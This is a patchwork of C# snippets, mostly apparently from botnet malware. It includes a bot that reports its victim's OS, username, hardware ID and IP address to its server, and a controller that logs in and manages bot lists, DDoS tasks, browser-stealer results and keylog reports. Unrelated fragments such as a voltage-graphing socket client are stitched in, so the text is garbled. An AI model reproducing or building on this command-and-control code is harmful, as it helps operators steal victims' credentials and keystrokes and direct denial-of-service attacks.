private void ServerSocket_OnClientReceivedBuffer(CClientSocket ClientSocket, byte[] buffer) { lock (Connections) { for (int i = 0; i < Connections.Count; i++) { if (Connections[i].ClientSocket == ClientSocket) { if (Connections[i].ConnectionType == EConnectionType.Unknown) { bool IsConnectionTypeParsed = false; if (buffer.Length >= 4) { int ConnectionType = BitConverter.ToInt32(buffer, 0); if (ConnectionType == (int)EConnectionType.Client || ConnectionType == (int)EConnectionType.Controller) { SConnection Connection = Connections[i]; Connection.ConnectionType = (EConnectionType)ConnectionType; if (Connection.ConnectionType == EConnectionType.Controller) { SControllerInformation ControllerInformation = new SControllerInformation { Clients = new List <SClient>() }; Connection.Information = ControllerInformation; } Connections[i] = Connection; IsConnectionTypeParsed = true; } } if (!IsConnectionTypeParsed) { //At this point we have received an invalid buffer ClientSocket.Disconnect(); } else if (IsConnectionTypeParsed && buffer.Length > 4) { //Initial parsing for understanding what kind of connection it is is complete but there is more data available byte[] NextBuffer = new byte[buffer.Length - 4]; Buffer.BlockCopy(buffer, 4, NextBuffer, 0, NextBuffer.Length); HandleReceivedBuffer(ClientSocket, i, Connections[i].ConnectionType, NextBuffer); } } else { HandleReceivedBuffer(ClientSocket, i, Connections[i].ConnectionType, buffer); } break; } } } }
void m_ClientSocket_OnClientConnected() { CDDoSHandler.StopAll(); CPacket Packet = m_ClientSocket.CreatePacket((Byte)BOT_PACKET.IDENT, String.Format("{0}|{1}|{2}|{3}|{4}", CBot.BotConfig.BotVersion, CUtils.GetOS(), CUtils.GetUsername(), CUtils.GetSHA1(CUtils.GetVolumeSerial()), CUtils.GetIPv4())); if (!m_ClientSocket.SendPacket(Packet)) { m_ClientSocket.Disconnect(); } }
void OnControllerIntroductionCallback(CClientSocket ClientSocket, int ConnectionIndex, byte[] arguments) { SControllerIntroduction ControllerIntroduction = (SControllerIntroduction)CSerialization.Deserialize <SControllerIntroduction>(arguments); SControllerAnswer ControllerAnswer = new SControllerAnswer { IsAuthorized = false, key = -1 }; SConnection Connection = Connections[ConnectionIndex]; if (ControllerIntroduction.Password != Program.ControllerPassword) { //Tell the controller that password was not accepted Connection.ClientSocket.SendPacket <SControllerAnswer>((byte)EControllerPackets.Introduction, ControllerAnswer); //At this stage the password is not valid, so we disconnect the invalid controller ClientSocket.Disconnect(); return; } int key = GenerateKeyForController(); //Authorize connection SControllerInformation ControllerInformation = (SControllerInformation)Connection.Information; ControllerInformation.IsAuthorized = true; ControllerInformation.Key = key; Connection.Information = (object)ControllerInformation; Connections[ConnectionIndex] = Connection; //Key for controlling clients ControllerAnswer.key = key; ControllerAnswer.IsAuthorized = true; //Tell the controller that he is authorized Connection.ClientSocket.SendPacket <SControllerAnswer>((byte)EControllerPackets.Introduction, ControllerAnswer); }
private void button1_Click(object sender, EventArgs e) { soc.Disconnect(); }
public Form1() { InitializeComponent(); zedview = new ZedGraphView(ref zedGraphControl1); //init zedview.Init(); //Events ---- btnConnect.Click += (o, e) => { txbData.Text = string.Format("Connect to: {0}:{1}", txbAddress.Text, nmPort.Value); soc = new CClientSocket(txbAddress.Text, (int)nmPort.Value); soc.OnConnect += (_soc) => { Invoke((MethodInvoker) delegate { txbData.AppendText(string.Format("Socket {0} is connected", _soc.RemoteEndPoint.ToString())); //btnConnect.Text = "Disconnect"; timer1.Enabled = true; }); }; //soc.OnRead += (_soc) => //{ // Invoke((MethodInvoker)delegate // { // //Format receive: $$,11.1444,6.2323,13.4445,$$ (Hercules - TCP Server) // string strdata = soc.ReceivedText; // //txbData.AppendText(string.Format("Receive {0}:: Data: {1}", _soc.ToString(), strdata)); // txbData.AppendText(strdata + " \r\n"); // string[] subdata = strdata.Split(','); // // // if (subdata[0] == "$") // { // if (subdata.Length >= 3) // { // if (subdata[1] != null) // { // double.TryParse(subdata[1], out volt); //Volt 1 // double.TryParse(subdata[2], out volt1); //Volt 2 // double.TryParse(subdata[3], out volt2); //Volt 3 // zedview.Draw(volt, volt1, volt2); // } // } // } // }); //}; soc.OnDisconnect += (_soc) => { Invoke((MethodInvoker) delegate { txbData.AppendText(string.Format("Disconnect {0}", _soc.ToString())); //btnConnect.Text = "Connect"; }); }; soc.Connect(); }; btnDisconnect.Click += (o, e) => { soc.Disconnect(); }; // btnSend.Click += (o, e) => { soc.SendText(txbSend.Text); }; // btnClear.Click += (o, e) => zedview.Init(); }
void m_ClientSocket_OnClientReceiveData(CPacket Packet) { if (this.OnPacketReceived != null) { this.OnPacketReceived.Invoke(Packet); } try { #region PARSE_ARGUMENTS byte[] arr_bArguments = Packet.GetPacketBufferFromBlocks(); String[] arr_strArguments = null; if (arr_bArguments != null) { arr_strArguments = UnicodeEncoding.Unicode.GetString(arr_bArguments, 0, arr_bArguments.Length).Split('|'); } #endregion MASTER_PACKET MasterPacket = (MASTER_PACKET)Packet.PacketHeader.Packet; switch (MasterPacket) { #region LOGIN_PACKET case MASTER_PACKET.LOGIN: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.LOGIN_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted LOGIN Packet received."); break; } /* * [0] = Botnet name */ if (this.OnLogin != null) { this.OnLogin.Invoke(arr_strArguments[0]); } this.IsAuthorized = true; m_ClientSocket_OnLog("LOGIN Packet received. You are now authorized."); } break; #endregion #region LOGIN_KEY_PACKET case MASTER_PACKET.LOGIN_KEY: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.LOGIN_KEY_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted LOGIN_KEY Packet received."); break; } Int32 iData = -1; if (Int32.TryParse(arr_strArguments[0], out iData)) { if (iData == 1) //Server requested Public Key a.k.a First authorization { m_ClientSocket_OnLog("Server asked for Public-Key"); CPacket PublicKey = m_ClientSocket.CreatePacket((Byte)MASTER_PACKET.LOGIN_KEY, Program.ControllerConfig.AdminPublicKey); if (!m_ClientSocket.SendPacket(PublicKey)) { m_ClientSocket_OnLog("Failed to send Public-Key to server."); m_ClientSocket.Disconnect(); } else { m_ClientSocket_OnLog("Public-Key sent to server."); } } } else { m_ClientSocket_OnLog("Received Encrypted Random-Message for Authorization"); //This is the random encrypted message Byte[] arr_bEncryptedAuth = Convert.FromBase64String(arr_strArguments[0]); //Decrypt it with Private Key arr_bEncryptedAuth = CRSA.Decrypt(arr_bEncryptedAuth, Program.ControllerConfig.AdminPrivateKey, 2048); //Failed to decrypt if (arr_bEncryptedAuth == null) { m_ClientSocket_OnLog("Failed to decrypt Random-Message"); m_ClientSocket.Disconnect(); return; } //Send plain-text response to confirm authorization /*if (!m_ClientSocket.SendData(this.BuildPacket(MASTER_PACKET.LOGIN_KEY, arr_bEncryptedAuth))) * m_ClientSocket.Disconnect();*/ CPacket AuthPacket = m_ClientSocket.CreatePacket((Byte)MASTER_PACKET.LOGIN_KEY, arr_bEncryptedAuth); if (!m_ClientSocket.SendPacket(AuthPacket)) { m_ClientSocket_OnLog("Failed to send decrypted Random-Message. Authorization failed."); m_ClientSocket.Disconnect(); } else { m_ClientSocket_OnLog("Decrypted Random-Message sent to Server. Authorization complete. Waiting for answer."); } } } break; #endregion #region BOTLIST_PACKET case MASTER_PACKET.BOTLIST: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.BOTLIST_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted BOTLIST packet received."); break; } /* * [0] = Botlist * [1] = Page */ int iCurrentBotPage = -1; if (Int32.TryParse(arr_strArguments[1], out iCurrentBotPage)) { Program.ControllerConfig.CurrentBotPage = iCurrentBotPage; String[] arr_strBots = arr_strArguments[0].Split(';'); if (this.OnBots != null) { this.OnBots.Invoke(arr_strBots, Program.ControllerConfig.CurrentBotPage); } m_ClientSocket_OnLog("BOTLIST packet received. Your Botlist has been updated."); } } break; #endregion #region TASKLIST_PACKET case MASTER_PACKET.TASKLIST: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.TASKLIST_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted TASKLIST packet received."); break; } /* * arr_strArguments: * [0] = Tasks * [1] = Page */ String[] arr_strTasks = arr_strArguments[0].Split(';'); if (OnMainTasks != null) { OnMainTasks.Invoke(arr_strTasks); m_ClientSocket_OnLog("TASKLIST packet received. Your Main Tasklist has been updated."); } } break; #endregion #region REMOVE_TASK_PACKET case MASTER_PACKET.REMOVE_TASK: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.TASK_REMOVE_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted REMOVE_TASK Packet received."); break; } Int32 iRemovedTaskID = -1; if (Int32.TryParse(arr_strArguments[0], out iRemovedTaskID)) { if (OnMainTaskRemoved != null) { OnMainTaskRemoved.Invoke(iRemovedTaskID); m_ClientSocket_OnLog(String.Format("REMOVE_TASK packet received. Task: {0} has been removed.", iRemovedTaskID)); } } } break; #endregion #region STATISTICS_PACKET case MASTER_PACKET.STATISTICS: { if (!this.IsAuthorized) { this.m_ClientSocket.Disconnect(); } if (arr_strArguments == null || arr_strArguments.Length != CConstants.STATISTICS_ARGUMENT_COUNT) { m_ClientSocket_OnLog("Corrupted STATISTICS packet received."); break; } int iStatisticsType = -1; if (!int.TryParse(arr_strArguments[0], out iStatisticsType)) { break; } STATISTICS_TYPE StatisticsType = (STATISTICS_TYPE)iStatisticsType; switch (StatisticsType) { case STATISTICS_TYPE.INFORMATION: string[] arr_strInfoData = arr_strArguments[1].Split(';'); if (arr_strInfoData.Length != 8) { break; } /* * arr_strArguments: * [0] = Total Bots * [1] = Online Bots * [2] = Total Bot Pages * [3] = Total Main Tasks * [4] = Total Main Tasks Pages * [5] = Total Browser Stealer * [6] = Total Keylog Reports */ int iTotalBots, iOnlineBots, iTotalMainTasks, iTotalDdosTasks, iTotalBrowserStealer, iTotalKeylogReports; int iAVGCPU; if (Int32.TryParse(arr_strInfoData[0], out iTotalBots) && Int32.TryParse(arr_strInfoData[1], out iOnlineBots) && Int32.TryParse(arr_strInfoData[2], out iTotalMainTasks) && Int32.TryParse(arr_strInfoData[3], out Program.ControllerConfig.ResultsPerPage) && int.TryParse(arr_strInfoData[4], out iTotalDdosTasks) && int.TryParse(arr_strInfoData[5], out iTotalBrowserStealer) && int.TryParse(arr_strInfoData[6], out iTotalKeylogReports) && int.TryParse(arr_strInfoData[7], out iAVGCPU)) { if (this.OnTotalBots != null) { this.OnTotalBots.Invoke(iTotalBots, iOnlineBots); } Program.ControllerConfig.TotalBotPages = CUtils.GetPageCount(iTotalBots); if (this.OnTotalMainTasks != null) { this.OnTotalMainTasks.Invoke(iTotalMainTasks); } if (this.OnResultsPerPage != null) { this.OnResultsPerPage.Invoke(); } if (this.OnTotalDdos != null) { this.OnTotalDdos.Invoke(iTotalDdosTasks); } Program.ControllerConfig.TotalBrowserStealer = iTotalBrowserStealer; Program.ControllerConfig.TotalStealerPages = CUtils.GetPageCount(iTotalBrowserStealer); Program.ControllerConfig.TotalKeylog = iTotalKeylogReports; Program.ControllerConfig.TotalKeylogPages = CUtils.GetPageCount(iTotalKeylogReports); // if (this.OnTotalKeylogReports != null) this.OnTotalKeylogReports.Invoke(iTotalKeylogReports); Program.ControllerConfig.AverageCPUUsage = iAVGCPU; m_ClientSocket_OnLog("Information STATISTICS packet received. Statistics has been updated."); } break; case STATISTICS_TYPE.OS: string[] arr_strOSData = arr_strArguments[1].Split(';'); if (arr_strOSData != null && this.OnOSStatistics != null) { this.OnOSStatistics.Invoke(arr_strOSData); } m_ClientSocket_OnLog("OS STATISTICS packet received. OS Statistics has been updated."); break; case STATISTICS_TYPE.COUNTRY: string[] arr_strCountryData = arr_strArguments[1].Split(';'); if (arr_strCountryData != null && this.OnCountryStatistics != null) { this.OnCountryStatistics.Invoke(arr_strCountryData); } m_ClientSocket_OnLog("Country STATISTICS packet received. Country Statistics has been updated."); break; default: break; } } break; #endregion #region DDOSLIST_PACKET case MASTER_PACKET.DDOSLIST: { string[] arr_strDdoslist = null; if (arr_strArguments != null && arr_strArguments.Length == CConstants.DDOSLIST_ARGUMENT_COUNT) { arr_strDdoslist = arr_strArguments[0].Split(';'); } if (this.OnDdosList != null) { this.OnDdosList.Invoke(arr_strDdoslist); } } break; #endregion #region STEALERLIST_PACKET case MASTER_PACKET.STEALERLIST: { if (arr_strArguments == null || arr_strArguments.Length != 2) { m_ClientSocket_OnLog("Corrupted STEALERLIST packet received."); break; } int iPage = -1; if (!int.TryParse(arr_strArguments[1], out iPage)) { break; } var StealerList = arr_strArguments[0].Split(';'); if (this.OnBrowserStealer != null) { this.OnBrowserStealer.Invoke(StealerList, iPage); } } break; #endregion #region KEYLOGLIST_PACKET case MASTER_PACKET.KEYLOGLIST: { if (arr_strArguments == null || arr_strArguments.Length != 2) { m_ClientSocket_OnLog("Corrupted KEYLOGLIST packet received."); break; } int iPage = -1; if (!int.TryParse(arr_strArguments[1], out iPage)) { break; } var KeylogList = arr_strArguments[0].Split(';'); if (this.OnKeylogReports != null) { this.OnKeylogReports.Invoke(KeylogList, iPage); } } break; #endregion #region KEYLOG_REPORT_PACKET case MASTER_PACKET.KEYLOG: { if (arr_strArguments == null || arr_strArguments.Length != 1) { m_ClientSocket_OnLog("Corrupted KEYLOG Report packet received."); break; } var arr_strReportData = arr_strArguments[0].Split('*'); /* * [0] = Title * [1] = Length * [2] = Bot ID * [3] = Data * [4] = ID * [5] = Bot IPv4 * [6] = Bot OS * [7] = Bot Username * [8] = Bot HWID */ if (arr_strReportData.Length != 9) { m_ClientSocket_OnLog("Corrupted KEYLOG Report data."); break; } if (this.OnKeylogReport != null) { this.OnKeylogReport.Invoke(arr_strReportData); } } break; #endregion #region KEYLOG_REMOVE_PACKET case MASTER_PACKET.KEYLOG_REMOVE: { if (arr_strArguments == null || arr_strArguments.Length != 1) { m_ClientSocket_OnLog("Corrupted KEYLOG_REMOVE packet received."); break; } int iReportID = -1; if (!int.TryParse(arr_strArguments[0], out iReportID)) { break; } if (this.OnKeylogReportRemoved != null) { this.OnKeylogReportRemoved.Invoke(iReportID); } } break; #endregion default: { m_ClientSocket_OnLog("Unknown Packet received."); break; } } } catch { } }